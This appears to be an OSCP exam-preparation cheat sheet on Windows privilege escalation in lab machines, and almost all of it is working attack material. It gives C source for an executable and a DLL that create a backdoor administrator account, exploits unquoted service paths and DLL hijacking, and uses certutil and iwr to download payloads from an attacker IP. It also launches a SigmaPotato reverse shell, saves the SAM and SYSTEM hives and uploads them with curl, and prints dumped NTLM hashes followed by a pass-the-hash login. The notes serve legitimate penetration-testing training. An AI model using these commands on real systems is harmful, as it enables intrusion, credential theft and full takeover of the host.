Skip to content

OSCPExamTips

SSH connection

ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" learner@192.168.50.52

The UserKnownHostsFile=/dev/null and StrictHostKeyChecking=no options have been added to prevent the known-hosts file on our local Kali machine from being corrupted.

From a security perspective, this is not best practice. The reason we use these options is to eliminate our known-hosts file from identifying mismatched machine info when we revert lab machines. Using the UserKnownHostsFile=/dev/null option prevents the server host key from being recorded. This means that every time we connect, it will be treated like a new connection. By using the StrictHostKeyChecking=no option, we are telling SSH not to verify the authenticity of the server host key.

In the real world, using either (or both) of these options would open us up to man-in-the-middle attacks. We use it here to make the student's learning experience smoother.

adduser.exe

#include <stdlib.h>

int main ()
{
  int i;

  i = system ("net user dave2 password123! /add");
  i = system ("net localgroup administrators dave2 /add");

  return 0;
}

x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

List of services with spaces and missing quotes in the binary path

Get-CimInstance -ClassName win32_service | Select Name,State,PathName

wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """

ReynhSurveillance Stopped C:\Enterprise Software\Monitoring Solution\Surveillance Apps\ReynhSurveillance.exe

16.2.3. Unquoted Service Paths

Q2:

Only Surveillance.exe works

copy adduser.exe "C:\Enterprise Software\Monitoring Solution\Surveillance.exe"

16.3.2

Q3: DLL hijacking

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
        i = system ("net user dave3 password123! /add");
        i = system ("net localgroup administrators dave3 /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

x86_64-w64-mingw32-gcc test.c --shared -o test.dll

iwr -uri http://192.168.45.241/test.dll -Outfile EnterpriseServiceOptional.dll

certutil.exe -f -urlcache http://192.168.45.241/test.dll EnterpriseServiceOptional.dll

iwr -uri http://192.168.45.241/rev.dll -Outfile EnterpriseServiceOptional.dll

certutil.exe -f -urlcache http://192.168.45.241/SigmaPotato.exe SigmaPotato.exe

certutil.exe -f -urlcache http://192.168.45.241/rev.exe rev.exe

.\SigmaPotato.exe --revshell 192.168.45.241 445

cmd /c dir /S /B SAM == SYSTEM == SAM.OLD == SYSTEM.OLD == SAM.BAK == SYSTEM.BAK

c:\Program Files\Common Files\System
c:\Program Files (x86)\Common Files\System
c:\ProgramData\USOShared\Logs\System
c:\Users\All Users\USOShared\Logs\System
c:\Windows\System
c:\Windows\assembly\NativeImages_v4.0.30319_32\System
c:\Windows\assembly\NativeImages_v4.0.30319_64\System
c:\Windows\diagnostics\system
c:\Windows\Microsoft.NET\assembly\GAC_MSIL\System
c:\Windows\PLA\System
c:\Windows\SysWOW64\LogFiles\SAM
c:\Windows\Vss\Writers\System

SeBackupPrivilege abuse

# Create a temp directory:
mkdir C:\temp

# Copy the sam and system hive of HKLM to C:\temp and then download them.
reg save hklm\sam C:\temp\sam.hive

reg save hklm\system C:\temp\system.hive

# Transfer to Kali
cmd /c curl -F "file=@sam.hive" http://192.168.45.241:8081/upload

cmd /c curl -F "file=@system.hive" http://192.168.45.241:8081/upload

# Dump hash
$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0xb4999e49259682622dcc1e3a1636ff45
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f518eb35353d7a83d27e7fe457664e5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:856f13362db36284f7d964120d794a98:::
enterpriseadmin:1001:aad3b435b51404eeaad3b435b51404ee:d94267c350fc02154f2aff04d384b354:::
diana:1002:aad3b435b51404eeaad3b435b51404ee:3f2e7dddbe7a42d8978c1689b67297f3:::
alex:1003:aad3b435b51404eeaad3b435b51404ee:821036ef8b6f43194779f6fca426f3f7:::
enterpriseuser:1004:aad3b435b51404eeaad3b435b51404ee:b875ee792421982ebcfa8217340ef376:::
offsec:1005:aad3b435b51404eeaad3b435b51404ee:d2ce08a1ee362158863d47d478b2622e:::
[*] Cleaning up...

$ evil-winrm -i 192.168.207.222 -u "Administrator" -H "8f518eb35353d7a83d27e7fe457664e5"